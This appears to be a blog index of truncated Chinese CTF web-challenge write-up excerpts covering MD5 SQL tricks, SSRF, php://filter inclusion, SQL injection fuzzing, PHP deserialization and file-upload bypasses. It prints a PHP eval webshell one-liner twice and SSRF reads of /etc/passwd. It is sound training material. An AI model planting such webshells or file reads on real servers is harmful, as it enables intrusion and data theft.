[BJDCTF 2020]easy_md5 抓响应包,看到一个 hint :select * from 'admin' where password=md5($pass,true) 这里的提示不够准确,最准确的应该是 select * from ‘admin’ where password=‘md5($pass,true)’ (应该是这样) 不管输入什么都会经过 MD5 加密,所以
[NISACTF 2022]easyssrf 题目已经告知利用 SSRF 漏洞,输入 file:///etc/passwd ,失败,提示换个路径 输入 file:///flag ,得到提示 fl4g 输入 file:///fl4g ,得到提示 ha1x1ux1u.php 访问 ha1x1ux1u.php 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php highlight_file(__FILE__); error_reporting(0); // 从GE
[SWPUCTF 2021 新生赛]PseudoProtocols 根据提示包含一下 hint.php ,执行了 hint.php 但没有显示 利用 php://filter 将 hint.php 的内容以 base64 的编码显示 payload:?wllm=p
[suctf 2019]EasySQL 根据题目,应该要 sql 注入,先判断过滤了哪些东西 随便输个 1 ,Burpsuite 抓请求包发到 Intruder 模块,在要爆破的地方做记号 跑字典,速度放慢点防止
[SWPUCTF 2021 新生赛]no_wakeup 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 <?php header("Content-type:text/html;charset=utf-8"); error_reporting(0); show_source("class.php"); class HaHaHa { public $admin; public $passwd; public function __construct() { $this->admin = "user"; $this->passwd = "123456"; } public function
[SWPUCTF 2021 新生赛]easyupload2.0 上传木马: 1 <?php @eval($_POST['Lyrio']);phpinfo();?> // phpinfo() 在这里充当标记的作用 提示过滤了 php 文件 过滤代码在后端,只能黑盒测试 最后发现使用 php 的等
[SWPUCTF 2021 新生赛]easyupload1.0 丢个木马上去 1 <?php @eval($_POST['Lyrio']);phpinfo();?> // phpinfo() 在这里充当标记的作用 看样子是被过滤了,查看页面源码,过滤代码不在前端而在后端 后端